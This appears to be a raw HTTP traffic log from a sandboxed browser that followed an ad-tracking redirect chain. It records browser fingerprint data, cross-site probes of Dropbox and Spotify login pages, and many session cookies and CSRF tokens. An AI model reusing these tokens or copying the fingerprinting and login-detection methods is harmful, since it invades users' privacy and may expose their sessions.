x-amz-apigw-id: XqdN-FzkIAMFy4w=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-630da8bf-37b930cb3e54dfa21883ead4;Sampled=0
x-amzn-remapped-date: Tue, 30 Aug 2022 06:05:51 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: lpnEYXkNqGxPiVSToeatrE1dQhERF7CIEs7nYZEJWJbAsL3dqs9SaA==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:25:19 GMT
age: 19797
etag: "8f8d5827588201a2b6aa883cbf812b0db2318df2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11776
Md5:    940d722cca434f3267ad6a1567b92e7b
Sha1:   8f8d5827588201a2b6aa883cbf812b0db2318df2
Sha256: 33c16b50e7c317df2b91def5625e8e39c8c2ecc75054ee40f82d4b22c80eb831
                                        
                                            GET /login?cont=https%3A%2F%2Fwww.dropbox.com%2Fstatic%2Fimages%2Ficons%2Ficon_spacer-vflN3BYt2.gif HTTP/1.1 
Host: www.dropbox.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         162.125.71.18
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
cache-control: no-cache,no-cache, no-store
content-security-policy: base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; connect-src https://* ws://127.0.0.1:*/ws ; default-src 'none' ; font-src https://* data: ; form-action 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' https://www.dropbox.com/static/api/ https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client 'nonce-wx/ftw8NmaADIGeezyuy' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ blob:, report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-wx/ftw8NmaADIGeezyuy' 'nonce-xUWjYSpFoV9cfYYTZoDu'
referrer-policy: strict-origin-when-cross-origin
set-cookie: gvc=MjIwOTgxNjYxNTU4MzAyNTEzMDk2NDMxMzQ3MTg1ODgyNDI4MTAz; expires=Thu, 02 Sep 2027 02:55:15 GMT; HttpOnly; Path=/; SameSite=None; Secure t=1TVcgdwXpUzdvwcf8eJkJc8M; Domain=dropbox.com; expires=Tue, 02 Sep 2025 02:55:15 GMT; HttpOnly; Path=/; SameSite=None; Secure __Host-js_csrf=1TVcgdwXpUzdvwcf8eJkJc8M; expires=Tue, 02 Sep 2025 02:55:15 GMT; Path=/; SameSite=None; Secure __Host-ss=eRTDFjhixc; expires=Tue, 02 Sep 2025 02:55:15 GMT; HttpOnly; Path=/; SameSite=Strict; Secure locale=en; Domain=dropbox.com; expires=Thu, 02 Sep 2027 02:55:15 GMT; Path=/; SameSite=None; Secure
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-server-response-time: 204
x-xss-protection: 1; mode=block
date: Sat, 03 Sep 2022 02:55:15 GMT
server: envoy
strict-transport-security: max-age=31536000; includeSubDomains
content-encoding: gzip
vary: Accept-Encoding
x-dropbox-response-origin: far_remote
x-dropbox-request-id: ab1f7a9a6fee4760a3cfa2e840dbec0d
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   34226
Md5:    749aa08de039477d0704d1f61d0b3838
Sha1:   ad2c76e66d0cab71c964fdb9f1370e5bb9b821a8
Sha256: e7879cf63db6dfb091ab92f494af2caab78cc7a98e21955303b711b39e8d8b43
                                        
                                            GET /smartlink-css/6312c212994913464d155879?sop=3&mouse_movements=0&mouse_distance=0&mouse_clicks=0&mouse_active=0&mouse_speed=0 HTTP/1.1 
Host: novidash.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:18 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6ImRQN2NwRW9FMGkxbGFyTVBDMTBNUFE9PSIsInZhbHVlIjoid3NwMXhMR3BIUGJxUGJZQUxqUDJMdEZmOVZyOC9xQW04YlhRbG9yMi9vOEFUL3F6cW03dHE4SXU5c3o3WmN4bEVLYUFFYkNTL1FlWTBYWThVRkl4WTkrNEFJWktMQWtUR2d0Nm9qMU5tNWNWU045U3hRcjRWd3VJMGlhYnBhYTIiLCJtYWMiOiI0NmI1MDA1MGU1ODVhMjFkNWU5NjIyY2RiNWNiMWY1NTgwNDJkOTI2NzgzYjJlYjZiOGUzOWE5Y2VkMDc0NTZiIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:18 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IlNMSFUxcEtYME51blAwRmJVM1J6QUE9PSIsInZhbHVlIjoiS3pDUm1Gd3pMVnFiVXdqbXZ0ckhydmg1VXJzNytieXMwMURlMENET1lxUGhCUEFCOE1XUFdLaHpqdmJtWjVWajViNmhnRmg2ZzF3ZFdwTldUbm1halZBL2MrZHVwRlBkY0xDUVNycmRqNUZBK29WcWYzdXUwaEtXN3pvNnN6YloiLCJtYWMiOiIyNDhiZjA4NDk1ZDQ0NWE4ODA4ZTMwN2Y0YWFlZDYzMzdiMTI2N2VmMzg4OGYyYTcxN2U0ZTVkZWIyMjg2YjAwIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:18 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /smartlink-css/6312c212994913464d155879 HTTP/1.1 
Host: 0ee06.trknovi.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0ee06.trknovi.com/smartlink?track=eyJ1c2VyX2lkIjoxMzc5LCJjcmVhdGl2ZV9pZCI6IjI5MDcyMCIsImxhbmRlcl9pZCI6IjEyNSJ9&click_id=wumnpcku2gu4m2pii7rf3oas&subid=9dd1b15d-f028-4d41-b731-bec13c85ae61
Cookie: XSRF-TOKEN=eyJpdiI6InRzblNVVWV0cFBURlA5MVJBL1ZBTXc9PSIsInZhbHVlIjoiVWF3cnYyVlBmVEcyMTdzZmhhcHlxM1dyOW1IdWdqNjZady9QZDAwcmN4TnlxbnZpY2tobk0vNlJrQlZ4TWJYaVFZUTZyR05WOXhMekxCM0JjS3dFUkhRMHZ0SGtyT3hwWnBPcHpveTNTMjFQdkJnUUNVK1dMUDNDNVlCS21uWGgiLCJtYWMiOiI0NDBjNGJiMzQxYTc1MTFmYjdmZDY0NmFjZWZmNTM3NmExM2EyOTBjZjA5OTJiZDMxZmFiNTI5NGNiNDgwZGYyIiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6ImlCOHRGMzBwanM0UDlmSGcvSEdkTlE9PSIsInZhbHVlIjoiSHNjRDkwZ2EwcDFmdXA3cEdxNGRiQVVJajFNdy9vcTZSRWcxLzg2NWtSc3EyT0VHdkxUeUFKVERSY0wrVE5vbkt1OXZnSG5PN3oxcEpIejFGQWkzZUNIZzZiK3piT1VpS3laVmhGV3hxejh4b0UwUnAzcEUzZ01LNkxhZHVBVjYiLCJtYWMiOiJmMDZlYTM5OWYzNjE2NmJiM2UzZDE0MzQ2ZmI3YjFlNDI0ZWZhNzJjYzEzNDNmNTk0YjMzNjk5YzAzZmIxYjg4IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/css; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IjVNYzlFVTRYMGZsa3F4WmFUeisvb1E9PSIsInZhbHVlIjoibklyWU5nckxXVmFCUUhPMjV5YjAzZXJmYjFicGt4d1NHZk5kRElGNVBGWXRRYlVqSktrWjlGL0daL3FQWFFnYUpzdzdpMGEvdGZVUElJbGVxU09WTGtkbXVQWmV1UVFKVEJ3MWEyZjRuUlJnZy96RTZMbmprNkFnbDQyR3hHM2MiLCJtYWMiOiJkYTliYjQwNjYxMjY4NGY1YzcyMWY4MTcxYmNiNjMzZDRiODM5NTA4YmJjYmZmZGZiNjBjZjk4OGQ2NWJjMjIxIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IjlpTU1oYWJKejR5WUJBclBYanNvenc9PSIsInZhbHVlIjoiRGRZL1pSQVk0cGk5TkdGaFJ0SzF1MXdTcFhlY0NaMjUwMDVpSm8zSlFRd25kaDlqakRIZzQxREdwcjBjTFAvR1g4Z0dpQ2krdnFkKy9CTE01cmltQkJEVUtnZGFkMVdYUE1KN1FSbFhhdTZIOU9CelIyMWdzeVJtbDFyNDhCSmoiLCJtYWMiOiI1OGU3NmI2NjM4MzNhNTE0ZDBhODI4MzhjZWFjOWM3NDU0Y2I0NzZkOTQ1ZDc4MTgzYjE2ZWJjOWFmMmUwMGNlIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /smartlink?mongo_id=6312c212994913464d155879&mongo_grouped_id=6312bf94d058792a2663b3b7&redirect_url=https%3A%2F%2Fother.landerhd.com%2F899637196&fingerprint=eyJ3ZWJkcml2ZXIiOjAsImhlYWRsZXNzIjowLCJjaHJvbWUiOjAsIm9uTGluZSI6MSwiY29va2llRW5hYmxlZCI6MSwicGx1Z2lucyI6MCwibWltZVR5cGVzIjowLCJzY3JlZW5XaWR0aCI6MTI4MCwic2NyZWVuSGVpZ2h0IjoxMDI0LCJvdXRlcldpZHRoIjoxMjgwLCJvdXRlckhlaWdodCI6MTAyNCwiY29sb3JEZXB0aCI6MjQsImRldmljZU1lbW9yeSI6MCwiaGFyZHdhcmVDb25jdXJyZW5jeSI6MTYsInN0YW5kYWxvbmUiOjAsInRpbWV6b25lIjoiVVRDIiwibGFuZ3VhZ2UiOiJlbi1VUyIsImxhbmd1YWdlcyI6WyJlbi1VUyIsImVuIl0sInBsYXRmb3JtIjoiTGludXggeDg2XzY0IiwidG91Y2giOjAsImlmcmFtZSI6MCwiZXZhbCI6MzcsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChYMTE7IExpbnV4IHg4Nl82NDsgcnY6OTYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC85Ni4wIiwib3ZlcnJpZGUiOjEsImR1cmF0aW9uIjozMn0=&js=1 HTTP/1.1 
Host: 0ee06.trknovi.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Cookie: XSRF-TOKEN=eyJpdiI6IjVNYzlFVTRYMGZsa3F4WmFUeisvb1E9PSIsInZhbHVlIjoibklyWU5nckxXVmFCUUhPMjV5YjAzZXJmYjFicGt4d1NHZk5kRElGNVBGWXRRYlVqSktrWjlGL0daL3FQWFFnYUpzdzdpMGEvdGZVUElJbGVxU09WTGtkbXVQWmV1UVFKVEJ3MWEyZjRuUlJnZy96RTZMbmprNkFnbDQyR3hHM2MiLCJtYWMiOiJkYTliYjQwNjYxMjY4NGY1YzcyMWY4MTcxYmNiNjMzZDRiODM5NTA4YmJjYmZmZGZiNjBjZjk4OGQ2NWJjMjIxIiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6IjlpTU1oYWJKejR5WUJBclBYanNvenc9PSIsInZhbHVlIjoiRGRZL1pSQVk0cGk5TkdGaFJ0SzF1MXdTcFhlY0NaMjUwMDVpSm8zSlFRd25kaDlqakRIZzQxREdwcjBjTFAvR1g4Z0dpQ2krdnFkKy9CTE01cmltQkJEVUtnZGFkMVdYUE1KN1FSbFhhdTZIOU9CelIyMWdzeVJtbDFyNDhCSmoiLCJtYWMiOiI1OGU3NmI2NjM4MzNhNTE0ZDBhODI4MzhjZWFjOWM3NDU0Y2I0NzZkOTQ1ZDc4MTgzYjE2ZWJjOWFmMmUwMGNlIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
location: https://other.landerhd.com/899637196
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6Im00VStUdjhCeDdZelRWRDU0VHd0ZGc9PSIsInZhbHVlIjoiNXR0SndoTUZubC9zeE0xckY4SVFYaU1mbjBLUitBS20xOEt0cXhpbnlZcWVZejVyNkJRWW5EcXhpdC8zc1lRcVlKcUd4QmM1WUJSVWwvcWU0Rk41NC95VnBRNFlyY2FpVWdpa2RwRDZ5VWgzam5tYkY2UUM0Sm1zUXdPN3IyYVMiLCJtYWMiOiIzODgxZjg2ZjU0NjBmZGUwMTA1ZDY2MDllNzA3OGIwYTczYTNhNDAwNjc2YWZkODFkN2M2NGUxNWM1NmVmMGNmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6Iks3SFZ3bVFoa2hydkpJenU0anBjanc9PSIsInZhbHVlIjoiN3g4UmNoOTk5U2lSaUtrN1d5QzdtMnRiR01obG9wdHd1OHhmNFRZWjc1RDV4VCtRZHREMDFLSlM3UlBvWXA5RmdRKzJyQ3ZKZk5kL01MUDY2UjlDellUWk8rYzg0Z3YrQnFXWUNnek5RVUErdk85SjdBdDVIaGRNSENlSUZjeWoiLCJtYWMiOiI2NzE1NjI3Y2ExZjAwNzU0M2Y2ZTRjNWIxY2Q5YjNlNjY0Mjc5MDllMGRkMGNhZDE1NTRmN2YyNGQ2MmRhOGNlIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /de/login/?forward_url=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico HTTP/1.1 
Host: www.spotify.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         35.186.224.25
HTTP/2 302 Found
                                        
date: Sat, 03 Sep 2022 02:55:15 GMT
x-powered-by: Express
set-cookie: sp_usid=af354575-f3ec-456d-b6d5-58331f3b1b4f; Max-Age=1800; Domain=spotify.com; Path=/; Secure sp_m=de; Path=/; Domain=.spotify.com; Max-Age=115516800; Expires=Sat, 02 May 2026 02:55:15 GMT; Secure; HttpOnly; SameSite=Lax sp_t=cd187d17-be84-4747-8e1e-765bd04fae6d; Path=/; Domain=.spotify.com; Max-Age=31536000; Expires=Sun, 03 Sep 2023 02:55:15 GMT; Secure sp_new=1; Path=/; Domain=.spotify.com; Max-Age=86400; Expires=Sun, 04 Sep 2022 02:55:15 GMT; Secure sp_landing=https%3A%2F%2Fwww.spotify.com%2Fde%2Flogin%2F; Path=/; Domain=.spotify.com; Max-Age=86400; Expires=Sun, 04 Sep 2022 02:55:15 GMT; Secure; HttpOnly
location: https://accounts.spotify.com/login?continue=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico&_locale=de-DE
content-security-policy: base-uri 'none'; connect-src https: wss:; form-action https:; frame-ancestors 'self' https://*.spotify.com https://*.spotify.net; object-src 'none'
x-join-the-band: https://www.spotify.com/jobs/
sp-trace-id: 632cbd3d0252ec19
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-encoding: gzip
vary: Accept-Encoding
server: envoy
via: HTTP/2 edgeproxy, 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /login?continue=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico&_locale=de-DE HTTP/1.1 
Host: accounts.spotify.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         35.186.224.25
HTTP/2 200 OK
content-type: text/html;charset=utf-8
                                        
date: Sat, 03 Sep 2022 02:55:15 GMT
vary: Accept-Encoding
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
x-frame-options: deny
set-cookie: __Host-device_id=AQCQpqToQFMjbO2UsShKMSYwNj7Mum9BWAejnKlcW882ruYIBDxnAXJa-y_KUl2e1qiRZTvXyNuZ0cUC2O-eDAUSFClG8cSuPQ0;Version=1;Path=/;Max-Age=2147483647;Secure;HttpOnly;SameSite=Lax __Secure-TPASESSION=AQBTuUdbDdt2uDvPrj0gfn7kR32Jeubjuc8xQ1H65V8BXtSLfxHSQkU1LfKXfJdcEKKc27dNuvC8YE/2vUFUJiWLrCmk2Z/XzLw=;Version=1;Domain=accounts.spotify.com;Path=/;Secure;HttpOnly;SameSite=None sp_sso_csrf_token=013acda719309b397e7ca091c28a672e646e2bf8af31363632313733373135343232;Version=1;Domain=accounts.spotify.com;Path=/;Secure;SameSite=Lax sp_tr=false;Version=1;Domain=accounts.spotify.com;Path=/;Secure;SameSite=Lax __Host-sp_csrf_sid=78ccf50e188853056911a25c5abf8f3b3d88e72d4b21d94fab6c48655176aa55; Path=/; HttpOnly; Secure; Expires=2022-09-3 03:55:15.422; Max-Age=3600; SameSite=Lax
content-security-policy: default-src 'self'; script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://www.google.com https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ https://cdn.cookielaw.org/scripttemplates/ https://*.onetrust.com https://accounts.scdn.co; img-src 'self' https://i.imgur.com https://d2mv8tnci56s9d.cloudfront.net https://profile-images.scdn.co https://*.scdn.co https://graph.facebook.com https://fbcdn-profile-a.akamaihd.net https://*.fbcdn.net https://platform-lookaside.fbsbx.com https://www.google.com https://www.google-analytics.com https://stats.g.doubleclick.net data: https://accounts.scdn.co; font-src 'self' data: https://sp-bootstrap.global.ssl.fastly.net https://fonts.gstatic.com https://*.scdn.co; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/css2; frame-src 'self' https://www.spotify.com https://www.google.com https://app.adjust.com https://itunes.apple.com itms-apps: https://www.google.com/recaptcha/; connect-src 'self' https://*.spotify.com https://www.google-analytics.com https://*.ingest.sentry.io/;
x-content-security-policy: default-src 'self'; script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://www.google.com https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ https://cdn.cookielaw.org/scripttemplates/ https://*.onetrust.com https://accounts.scdn.co; img-src 'self' https://i.imgur.com https://d2mv8tnci56s9d.cloudfront.net https://profile-images.scdn.co https://*.scdn.co https://graph.facebook.com https://fbcdn-profile-a.akamaihd.net https://*.fbcdn.net https://platform-lookaside.fbsbx.com https://www.google.com https://www.google-analytics.com https://stats.g.doubleclick.net data: https://accounts.scdn.co; font-src 'self' data: https://sp-bootstrap.global.ssl.fastly.net https://fonts.gstatic.com https://*.scdn.co; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/css2; frame-src 'self' https://www.spotify.com https://www.google.com https://app.adjust.com https://itunes.apple.com itms-apps: https://www.google.com/recaptcha/; connect-src 'self' https://*.spotify.com https://www.google-analytics.com https://*.ingest.sentry.io/;
sp-trace-id: a7099648cd366c5a
content-encoding: gzip
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
server: envoy
via: HTTP/2 edgeproxy, 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /releases/v5.7.2/css/all.css HTTP/1.1 
Host: use.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.67.169.247
HTTP/2 200 OK
content-type: text/css
                                        
date: Sat, 03 Sep 2022 02:55:15 GMT
x-amz-id-2: 5NP8+xqRh1FzZXuC3zm1osHKfH9eWYVU3hULOnty9foAbYVoWS+RrTgF3GpHTQPZ4zo7NrfhwaQ=
x-amz-request-id: FGM1ZV7T0WW9J2JQ
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:45:57 GMT
etag: W/"7b1d7f457d056ace7b230b587b9f3753"
cache-control: max-age=31556926
cf-cache-status: HIT
age: 2113406
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NsrYouuc7sI%2FT6SW7GPRg3gqU2C%2FZcqw9GJhgEfCt9rV4uKE7uqWXRIBI%2Bv1UMCJa04PIzgDKK4%2FIbdfcVoRR1jsJ9wprLWpfLLflyEI6vb%2BvTV0F9h0rD8SVAyZTblVDurOwM1C"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 744b3496fb621bfa-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /smartlink-css/6312c212994913464d155879?sop=1&mouse_movements=0&mouse_distance=0&mouse_clicks=0&mouse_active=0&mouse_speed=0 HTTP/1.1 
Host: novidash.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:16 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6InczcTYvVTlkZGZvQ3VwaC9xNXdobmc9PSIsInZhbHVlIjoiWEZSWlFSVmpWdTdPRk9mV2xCWnRDWEYybXhjbTlRRW9XNE95azJYR0ZML2ZmZkg4Vyt0V21RbCtYb2tDbXlnZytJS1pBVnU0MmdOS2RRald0ZjBsemtDaUMwYWtsZk9VcGFQSEZCRkJIcnE2bk5zeUtaM3RzMzVxRnF2bWFZcDYiLCJtYWMiOiIxM2I5ZTc3NDBmNjYyMTFlNjhjYWQwZjNjNGRhM2Q3NmQyODZlYWFiNjBlZjEyNTNlOTAwZmFhM2QyOTY0NGIzIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:16 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IlRFS09nbit1VnFYa3A4d3lrSmNKcVE9PSIsInZhbHVlIjoiRnNNdW54bzJVb21ndjFzUW5ZRmgzbitSS215SE16SjQ0QmVwMEQwYngzS0FFaSs5bGYxaHdHRXRnMHdmMm9INzNGTjlrWGtjSnJYN3pORms3YTFmbW1HQ3k5aDFsYUozT3JPVkZqdmwzaGtETVo1S0l6WWF2R1JONzAwc0JndTYiLCJtYWMiOiJmMGMxYTM3NmEzNjVmZWQ2ZWNhYWZkZTUzMThmNjI2NGY3NTcyMWRiYjNiNmY2M2UzYjc1OTcxMmJhNGYzMDY5IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:16 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            POST /smartlink-css/6312c212994913464d155879 HTTP/1.1 
Host: novidash.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Content-Length: 352
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IkRUd3lENitwMFNFb2ZvMEdwNnhzL3c9PSIsInZhbHVlIjoiT1FOcXEwVklRMzVxMEpiaElRa0VoOWE2ZlVsanlvMmFVMGk0bG43MUtpYnk2bUpKMmtidktnalN0NCs5aUlGVFp6MndxZ3JJbTFmR043NG44UVl6OTN5Nk1oQWZuOFlEZ29OZkpxUU5PclBsS2FqYzVYckNxeDhtREJJaVJGNVUiLCJtYWMiOiI5OTgxNGFlZDEzNmJhMTA0YTBlMDg3NWJhMTFmNTdiZTdkNThiZTA0ZWI4ZTkwMzg3NGU2ZjZjOWFjYzAyZDA3IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6ImNZQ1FpMFdxOWlmTTVNVUQraGRSTkE9PSIsInZhbHVlIjoiVzBpWkMvUlFBN0tFZ1B4RlRlTWNpenRFTVYrWHNMTXp3WW9tdnVMdHVqelJWQmpndmlYdzRJUmVpdDFnMlZab1Byb1FJazlFejRpc2xFL1ZhcUZQQmZNWlFEMGEwa01LL1llSUdQYk50Q3NGTVJjUEVpU1ZiS0RlSTMvMmJCMnoiLCJtYWMiOiI2ODU0NjdlNGM4ZmE4ZGNjODVlNGRkYmM0NzM4YmJmY2MwY2NhMzg0OWM1MTM3ZDExMjFiOTYwNDYyNWQwNTdmIiwidGFnIjoiIn0%3D; 